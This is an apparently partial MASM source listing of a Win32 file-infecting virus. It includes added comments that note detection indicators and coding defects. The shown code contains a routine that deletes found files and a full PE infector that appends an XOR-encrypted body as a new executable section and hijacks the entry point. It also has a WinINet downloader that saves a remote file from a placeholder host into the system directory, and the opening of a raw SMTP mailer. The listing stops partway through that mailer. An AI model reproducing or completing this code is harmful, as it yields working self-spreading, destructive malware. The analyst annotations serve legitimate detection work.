win32.poly.showtime2.txt — virus source listing (Win32 PE section infector with an HTTP downloader and an SMTP mailer); annotated below for analysis only
EN_NEXT:
push edi
push hSearch
call _FindNextFile[ebx]
.UNTIL eax==0 ;FindNexeFile fail
ED_Close:
push hSearch
call _FindClose[ebx]
ED_Exit:
popad
ret 8
EnumDir ENDP
;-----------------------------------------------------------------------
; AnFile(FileName, FileType) -- action taken on one file found by the
; directory walk above (stdcall: two DWORD args, hence 'ret 8').
;   FILE_ALL : the file is deleted outright (destructive payload).
;   FILE_EXE : dispatch on extension, ".exe" -> InfectFile, ".htm" -> Parse_HTM.
; NOTE: esi is never loaded from FileName here -- the routine relies on
; the caller leaving esi at the NUL-terminated name (not visible in this
; view; confirm in EnumDir). All registers are preserved by pushad/popad.
; The extension test is a raw 4-byte compare, so it is case-sensitive:
; only lower-case ".exe" / ".htm" are matched, ".EXE" / ".Htm" are not.
;-----------------------------------------------------------------------
AnFile PROC FileName:DWORD,FileType:DWORD
pushad
AF_00: lodsb                            ; scan forward to the terminating NUL
or al,al
jnz AF_00                               ; on exit esi = one past the NUL
.if FileType == FILE_ALL ;FILE_ALL -> unconditional delete
push FileName
call _DeleteFile[ebx]
.elseif FileType == FILE_EXE ;FILE_EXE -> infect by extension
mov eax,DWORD ptr [esi-5]               ; the 4 bytes just before the NUL: ".ext"
.if eax =="exe."                        ; little-endian ".exe"
push FileName
call InfectFile                         ; PE infector below
.elseif eax == "mth."                   ; little-endian ".htm"
push FileName
call Parse_HTM                          ; not in this view
.endif
.endif
popad
ret 8
AnFile ENDP
; Infect a PE file (InfectFile below)
;-----------------------------------------------------------------------
; InfectFile(FileName) -- appends the virus body to a PE file as a new
; section and redirects the entry point to it. stdcall, one DWORD arg
; ('ret 4'); all registers preserved. Globals are reached through ebx,
; which appears to hold the delta base of the running copy (set outside
; this view).
;
; Target filter (any failure -> clean exit, file untouched):
;   * "MZ" magic, e_lfarlc == 40h, "PE\0\0" signature
;   * OptionalHeader.Subsystem == 2 (IMAGE_SUBSYSTEM_WINDOWS_GUI)
;   * infection marker: WORD at NT header + 1Ah != 0888h. That offset is
;     OptionalHeader.MajorLinkerVersion/MinorLinkerVersion, so an infected
;     host carries linker version 88h.08h -- a cheap detection indicator.
;   * room for one more IMAGE_SECTION_HEADER (28h bytes) within SizeOfHeaders
;
; Indicators written to the host:
;   * new section header: Name bytes 69 77 65 69 68 61 (on disk they read
;     "iweiha" -- the author's comment says "haiwei", but the dword/word
;     are stored little-endian), Characteristics 0E0000020h
;     (CNT_CODE | MEM_EXECUTE | MEM_READ | MEM_WRITE)
;   * AddressOfEntryPoint = new section VA; original entry saved (as a VA)
;     in HostEntry
;   * body written with the region [Load, Load+EncryptLen) XOR-ed with the
;     constant 12345678h -- a fixed key, so the stored form is identical on
;     every infection and is signature-able despite the "poly" name.
;
; Defects visible in this routine (left as-is; analysis notes only):
;   * if VirtualAlloc fails the jump to IF_F1 happens AFTER the headers
;     were edited in the writable view; UnmapViewOfFile flushes them, but
;     no body is written -> host corrupted.
;   * every 'div ecx' runs without clearing edx; it only works because the
;     preceding 'mul ecx' left edx = 0.
;   * the VirtualAlloc buffer (pMem) is never freed.
;   * WriteFile writes VirusLen bytes, not the file-aligned SizeOfRawData,
;     and its return value is not checked.
;   * each round-up adds one alignment unit even when already aligned.
;-----------------------------------------------------------------------
InfectFile PROC FileName : DWORD
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL pMapping : DWORD
LOCAL ByteWrite: DWORD
pushad
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push FileName
call _CreateFile[ebx];open the target read/write
cmp eax,INVALID_HANDLE_VALUE
jz IF_Exit
mov hFile,eax
push 0
push 0
push 0
push PAGE_READWRITE
push NULL
push hFile
call _CreateFileMapping[ebx] ;map the whole file (max size 0 = current length)
or eax,eax
jz IF_F3
mov hMapping , eax
push 0
push 0
push 0
push FILE_MAP_READ+FILE_MAP_WRITE
push hMapping
call _MapViewOfFile[ebx] ;writable view: header edits below go straight to the file
or eax,eax
jz IF_F2
mov pMapping,eax
mov esi,eax
assume esi :ptr IMAGE_DOS_HEADER;esi -> IMAGE_DOS_HEADER
.IF [esi].e_magic!=IMAGE_DOS_SIGNATURE ;"MZ"?
jmp IF_F1
.ENDIF
.IF [esi].e_lfarlc!=040h ;DOS relocation table at 40h (usual for PE stubs)
jmp IF_F1
.ENDIF
add esi,[esi].e_lfanew ;esi -> IMAGE_NT_HEADERS (original comment said edx; it is esi)
assume esi:ptr IMAGE_NT_HEADERS
.IF [esi].Signature!=IMAGE_NT_SIGNATURE ;"PE\0\0"?
jmp IF_F1
.ENDIF
.IF word ptr [esi].OptionalHeader.Subsystem!=2 ;GUI subsystem only
jmp IF_F1
.ENDIF
.IF word ptr [esi+1ah]==0888h ; infection marker: Major/MinorLinkerVersion == 88h/08h
jmp IF_F1
.ENDIF
mov eax,[esi].OptionalHeader.AddressOfEntryPoint;original entry RVA
add eax,[esi].OptionalHeader.ImageBase ;as a VA (no relocation/ASLR awareness)
mov HostEntry[ebx],eax ;saved for the body to return control to the host
;***************************************************************
;Is there room in the header area for one more section header?
;28h = sizeof IMAGE_SECTION_HEADER
;18h = sizeof Signature + IMAGE_FILE_HEADER
;edi will point at the slot for the new section header
;***************************************************************
movzx eax,[esi].FileHeader.NumberOfSections
mov ecx,28h
mul ecx ;eax = size of the section table (edx = 0 for any sane count)
lea edi,[esi]
sub edi,pMapping ;edi = file offset of the NT headers
add eax,edi
add eax,18h
movzx edi,[esi].FileHeader.SizeOfOptionalHeader
add eax,edi ;eax = file offset of the first free section-header slot
mov edi,eax
add edi,pMapping ;edi -> that slot inside the mapped view
add eax,28h
.IF eax>[esi].OptionalHeader.SizeOfHeaders ;the new header must end inside SizeOfHeaders
jmp IF_F1
.ENDIF
;*****************************************
;Room available: append the new section header and fill its fields.
;esi still points at IMAGE_NT_HEADERS; the previous (last) section
;header is reached via edi-28h to derive the new raw-data offset.
;*****************************************
inc [esi].FileHeader.NumberOfSections
assume edi:ptr IMAGE_SECTION_HEADER
mov dword ptr[edi],69657769h ;Name bytes "iwei" (little-endian; author intended "haiwei")
mov WORD ptr [edi+4],6168h;Name bytes "ha" -> on-disk name "iweiha"
push [esi].OptionalHeader.SizeOfImage
pop eax
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx ;edx not cleared: relies on the mul above having left edx = 0
inc eax
mul ecx ;SizeOfImage rounded up to the next SectionAlignment boundary
push eax ;section-aligned
pop [edi].VirtualAddress ;new section VA = end of the current image
mov eax,VirusLen
mov [edi].Misc.VirtualSize,eax
mov ecx,[esi].OptionalHeader.FileAlignment
div ecx ;again depends on edx == 0 from the preceding mul
inc eax
mul ecx
mov [edi].SizeOfRawData,eax ;VirusLen rounded up to FileAlignment
lea eax,[edi-28h+14h] ;previous section's PointerToRawData
mov eax,[eax]
lea ecx,[edi-28h+10h] ;previous section's SizeOfRawData
mov ecx,[ecx]
add eax,ecx
mov [edi].PointerToRawData,eax ;body goes right after the last section's raw data
mov [edi].Characteristics,0E0000020h ;CNT_CODE | MEM_EXECUTE | MEM_READ | MEM_WRITE
;***************************************************************
;Update SizeOfImage and AddressOfEntryPoint so the new section is
;mapped by the loader and executes first.
;***************************************************************
mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx ;edx assumed 0 (left by the mul above)
inc eax
mul ecx
add eax,[esi].OptionalHeader.SizeOfImage
mov [esi].OptionalHeader.SizeOfImage,eax ;grow the image by the section-aligned body size
mov eax,[edi].VirtualAddress
mov [esi].OptionalHeader.AddressOfEntryPoint,eax ;entry now points at the virus body
mov word ptr [esi+1ah],0888h ;write the infection marker (linker version 88h.08h)
push PAGE_EXECUTE_READWRITE
push MEM_COMMIT
push VirusLen
push NULL
call _VirtualAlloc[ebx] ;RWX scratch copy of the body, to be encrypted before writing
or eax,eax
jz IF_F1 ;headers are already modified at this point -- see defect list above
mov pMem[ebx],eax
push edi
push esi
mov edi,eax
lea esi,[offset VStart+ebx] ;source = the running virus image, delta-relocated via ebx
mov ecx,VirusLen
cld
rep movsb ;copy VirusLen bytes into the scratch buffer (ecx = 0 afterwards)
lea eax,[offset Load+ebx]
push ecx
lea ecx,[offset VStart+ebx]
sub eax,ecx ;eax = offset of Load within the body
add eax,pMem[ebx] ;eax -> Load inside the scratch copy
pop ecx ;(preserves the 0 left by rep movsb; overwritten on the next line anyway)
mov ecx,EncryptLen/4
En:
xor DWORD ptr [eax],12345678h ;fixed-key XOR over EncryptLen bytes from Load; same key every time
add eax,4
loop En
pop esi
pop edi
push FILE_BEGIN
push 0
push [edi].PointerToRawData
push hFile
call _SetFilePointer[ebx]
;****************************************************************
;Seek to the new section's raw offset and write the (encrypted) body
;through hFile while the view is still mapped. Only VirusLen bytes are
;written, not the file-aligned SizeOfRawData.
;****************************************************************
push 0
lea eax,ByteWrite
push eax
push VirusLen
mov eax,pMem[ebx]
push eax
push hFile
call _WriteFile[ebx] ;return value and ByteWrite are not checked
IF_F1:
push pMapping
call _UnmapViewOfFile[ebx] ;flushes the header edits made in the view
IF_F2:
push hMapping
call _CloseHandle[ebx]
IF_F3:
push hFile
call _CloseHandle[ebx]
IF_Exit:
popad
ret 4
InfectFile ENDP
;*******************************
; File download routine (WinINet)
;*******************************
;-----------------------------------------------------------------------
; DownloadFile(dwFile) -- fetches "http://xxx.net/<dwFile>" with WinINet
; and stores it as <SystemDirectory>\<dwFile>. Returns eax -> dwFileName,
; the full local path. dwFileName is a MAX_PATH buffer that lives inside
; this code (which is why the virus section is marked writable).
; Plain 'ret': the caller removes the one DWORD argument.
; WinINet is resolved at run time (LoadLibraryA/GetProcAddress); import
; names and string constants are inline 'db' data whose address is pushed
; by 'call label' over them (the return address is the string pointer).
;
; Network / host indicators:
;   * User-Agent "szlogin"; INTERNET_OPEN_TYPE_PRECONFIG (user proxy)
;   * INTERNET_FLAG_NO_AUTO_REDIRECT, plain HTTP
;   * URL host in this listing is the placeholder "xxx.net"
;   * drop file created with CREATE_NEW in the system directory
;
; Defects visible in this routine (left as-is; analysis notes only):
;   * the path is built with unbounded lstrcat into a MAX_PATH buffer.
;   * if the local file already exists, the CreateFile handle in eax is
;     never closed (jump to Fexsting).
;   * HttpQueryInfoA status code and content length are fetched but never
;     examined.
;   * the read loop exits only when InternetReadFile succeeds with
;     dwRead == 0; a FALSE return re-enters the loop indefinitely.
;   * early jumps to DF_ret reach CloseHandle(hSaveFile) and
;     GetProcAddress(esi) before those values are valid (esi is not yet
;     the Wininet module on the LoadLibraryA-failed path).
;-----------------------------------------------------------------------
DownloadFile proc dwFile:DWORD
pushad
call szWininet ;pushes the address of "Wininet.dll" as the argument
db "Wininet.dll",0
szWininet:
call _LoadLibraryA[ebx]
or eax,eax
jz DF_ret ;esi is NOT the module handle on this path, yet DF_ret uses it
mov esi,eax ;esi = hWininet for every GetProcAddress below
push MAX_PATH
call szFileName ;pushes the address of the in-code dwFileName buffer
dwFileName db MAX_PATH dup(0) ;local path buffer, inside the code; returned in eax
szFileName:
pop edi
push edi
call _GetSystemDirectory[ebx] ;dwFileName = system directory
or eax,eax
jz DF_ret
;append "\" then dwFile -> full local path (no length check)
@pushsz "\"
push edi
call _lstrcat[ebx]
push dwFile
push edi
call _lstrcat[ebx]
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ
push GENERIC_READ OR GENERIC_WRITE
push edi
call _CreateFile[ebx] ;probe: does the local copy already exist?
cmp eax,INVALID_HANDLE_VALUE
jnz Fexsting ;exists -> skip the download (handle in eax is leaked)
call szInternetOpen
db "InternetOpenA",0
szInternetOpen:
push esi
call _GetProcAddress[ebx]
push 0
push NULL
push NULL
push INTERNET_OPEN_TYPE_PRECONFIG ;honour the user's proxy configuration
call AgentName
db "szlogin",0 ;User-Agent string -- network indicator
AgentName:
call eax ;InternetOpenA(agent, PRECONFIG, NULL, NULL, 0)
or eax,eax
jz DF_ret
mov hSession[ebx],eax
call szInternetOpenUrl
db "InternetOpenUrlA",0
_InternetOpenUrlA dd 0 ;resolved pointer stored inline (code must be writable)
szInternetOpenUrl:
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _InternetOpenUrlA[ebx],eax
call Url
db "http://xxx.net/",0 ;base URL (placeholder host in this listing)
szUrl db MAX_PATH dup (0)
Url:
lea edi,[offset szUrl+ebx]
push edi
call _lstrcpy[ebx] ;szUrl = "http://xxx.net/"
push dwFile
push edi
call _lstrcat[ebx] ;szUrl += dwFile (unbounded)
push 0
push INTERNET_FLAG_NO_AUTO_REDIRECT
push 0
push NULL
push edi
push hSession[ebx]
call _InternetOpenUrlA[ebx] ;plain HTTP, redirects refused
or eax,eax
jz DF_ret
mov DWORD ptr hHttpFile[ebx],eax
mov DWORD ptr dwRead[ebx],MAX_PATH ;buffer length for the two header queries
call szHttpQueryInfo
db "HttpQueryInfoA",0
szHttpQueryInfo:
push esi
call _GetProcAddress[ebx]
mov edi,eax ;edi = HttpQueryInfoA
push NULL
lea ecx,[offset dwRead+ebx]
push ecx
lea ecx,[offset szBuffer+ebx]
push ecx
push HTTP_QUERY_STATUS_CODE
push hHttpFile[ebx]
call edi ;status code lands in szBuffer but is never examined
push NULL
lea ecx,[offset dwRead+ebx]
push ecx
lea ecx,[offset szBuffer+ebx]
push ecx
push HTTP_QUERY_CONTENT_LENGTH
push hHttpFile[ebx]
call edi ;content length likewise ignored
push NULL
push FILE_ATTRIBUTE_NORMAL
push CREATE_NEW
push NULL
push FILE_SHARE_READ
push GENERIC_READ OR GENERIC_WRITE
lea ecx,[offset dwFileName+ebx]
push ecx
call _CreateFile[ebx] ;create the drop file (fails if it appeared meanwhile)
cmp eax,INVALID_HANDLE_VALUE
jz DF_ret
mov hSaveFile[ebx],eax
call szInternetReadFile
db "InternetReadFile",0
szInternetReadFile:
push esi
call _GetProcAddress[ebx]
mov edi,eax ;edi = InternetReadFile
.repeat
lea ecx,[offset dwRead+ebx]
push ecx
push sizeof szBuffer
lea ecx,[offset szBuffer+ebx]
push ecx
push hHttpFile[ebx]
call edi ;InternetReadFile(hHttpFile, szBuffer, sizeof szBuffer, &dwRead)
.if eax
.break .if dwRead[ebx]== 0 ;EOF -- the only way out; a FALSE return keeps looping
push NULL
lea ecx,[offset dwWrite+ebx]
push ecx
push dwRead[ebx]
lea ecx,[offset szBuffer+ebx]
push ecx
push hSaveFile[ebx]
call _WriteFile[ebx] ;append the chunk; return value unchecked
.endif
.until 0
Fexsting:
push MAX_PATH
lea edi,[offset dwFileName+ebx]
push edi
call _GetSystemDirectory[ebx] ;rebuilds the same local path a second time
or eax,eax
jz DF_ret
@pushsz "\"
push edi
call _lstrcat[ebx]
push dwFile
push edi
call _lstrcat[ebx]
DF_ret:
push hSaveFile[ebx]
call _CloseHandle[ebx] ;also reached on paths that never opened hSaveFile
call szInternetCloseHandle
db "InternetCloseHandle",0
szInternetCloseHandle:
push esi
call _GetProcAddress[ebx] ;esi must be hWininet; not so on the LoadLibraryA-failed path
mov edi,eax
push hHttpFile[ebx]
call edi
push hSession[ebx]
call edi
popad
lea eax,[offset dwFileName+ebx] ;return the local path
ret
DownloadFile endp
;**************************************
; Mail-sending routine (raw SMTP over a socket; continues past this view)
;**************************************
SendMail proc eMail:DWORD
pushad
lea ecx,[offset wsa+ebx]
push ecx
push 101h
call _WSAStartup[ebx]
or eax,eax
jnz SM_ret
push 0
push SOCK_STREAM
push AF_INET
call _socket[ebx]
cmp eax,-1h
jz SM_ret
mov esi,eax
lea edi,[offset sock+ebx]
assume edi:ptr sockaddr_in
mov [edi].sin_family,AF_INET
push 25
call _htons[ebx]
mov [edi].sin_port,ax
call PushSmtpSrvr
db "smtp.163.com",0
PushSmtpSrvr:
call _gethostbyname[ebx]
assume eax:ptr hostent
mov eax,DWORD ptr [eax].h_list
mov eax,DWORD ptr [eax]
mov eax,DWORD ptr [eax]
mov DWORD ptr[edi].sin_addr,eax
push sizeof sockaddr_in
push edi
push esi
call _connect[ebx]
cmp eax,-1h
jz SM_ret
push 0
push 13
call Ehlo
db "EHLO o1i5a4",0dh,0ah
buffer db 2000h dup(0)
szCap db "test",0
Ehlo:
push esi
call _send[ebx]
push 0
push 12
call Auth
db "AUTH LOGIN",0dh,0ah
Auth:
push esi
call _send[ebx]
push 0
push 18
call szUserName
db "dfadsfaadf",0dh,0ah,0
szUserName:
push esi
call _send[ebx] ;發(fā)送用戶名.......
push 0
push 14
call Pass
password db "xxxxxxxxx",0dh,0ah,0 ;這里是經(jīng)過(guò)BASE64編碼的密碼
Pass:
push esi
call _send[ebx]
;invoke recv,esi,addr buffer,2000h,0
;invoke MessageBox,NULL,addr buffer,addr szCap,MB_OK
push 0
push 32
call Mailfrom
db "MAIL FROM: xxxx@163.com",0dh,0ah
Mailfrom: